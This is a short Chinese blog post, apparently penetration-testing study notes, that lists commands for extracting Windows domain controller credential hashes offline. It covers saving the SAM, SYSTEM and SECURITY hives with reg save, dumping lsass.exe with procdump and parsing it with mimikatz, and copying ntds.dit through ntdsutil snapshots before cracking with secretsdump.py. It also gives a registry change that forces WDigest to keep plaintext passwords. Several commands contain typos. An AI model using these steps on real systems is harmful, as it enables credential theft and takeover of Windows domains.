通过渗透测试的学习,将整理的离线提取域控HASH的几种方法给大家试试;

1、注册表提取


提取文件,Windows Server 2003或者Win XP 及以前需要提升到system权限,以后只要Administrator权限即可。

reg save hklm\sam sam.hive
reg save hklm\system system.hive
reg save hklm\security secruity.hive

本地获取

#如果要提取明文,请修改注册表
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
#破解hash
python ./secretsdump.py -sam ~/Desktop/sam.hive  -security ~/Desktop/security.hive -system ~/Desktop/system.hive  LOCAL

2、lsass.exe提取


 

procdump.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz#privilege::debug
mimikatz#sekurlsa::minidump lsass.dmp
mimikatz#sekrulsa::logonpasswords full  

3、ntds.dit提取


ntdsutil snapshot "activate instance ntds" create quit quit
ntdsutil snapshot "mount {GUID}" quit quit
copy MOUNT_POINT\windows\ntds\ntds.dit c:\temp\ntds.dit
ntdsutil snapshot "unmount {GUID}" "delete {GUID}" quit quit


python ./secretsdump.py -ntds ~/Desktop/ntds.dit -system ~/Desktop/system.hiv  LOCAL

版权声明:本文为mutudou原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://www.cnblogs.com/mutudou/p/13036243.html